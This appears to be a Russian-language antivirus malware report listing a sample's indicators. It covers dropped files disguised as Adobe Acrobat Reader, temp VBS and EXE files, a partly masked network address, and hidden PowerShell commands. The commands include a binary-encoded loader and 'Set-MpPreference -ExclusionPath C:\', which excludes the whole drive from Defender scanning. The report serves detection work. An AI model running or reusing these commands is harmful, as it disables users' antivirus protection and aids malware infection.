Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\adobe\acrobat reader dc.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,0010...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\1159836.cvr
- %TEMP%\acd.exe
- %TEMP%\_cjvdnberkfbwqwrpbjverv.vbs
- '19#.#27.158.111':80
- '%TEMP%\acd.exe'
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\_Cjvdnberkfbwqwrpbjverv.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,0010...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Test-Connection Bing.com' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'%APPDATA%\Microsoft\Windows\Start Menu\Programs\Adobe\Acrobat Reader DC.exe'' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Test-Connection Bing.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'%APPDATA%\Microsoft\Windows\Start Menu\Programs\Adobe\Acrobat Reader DC.exe'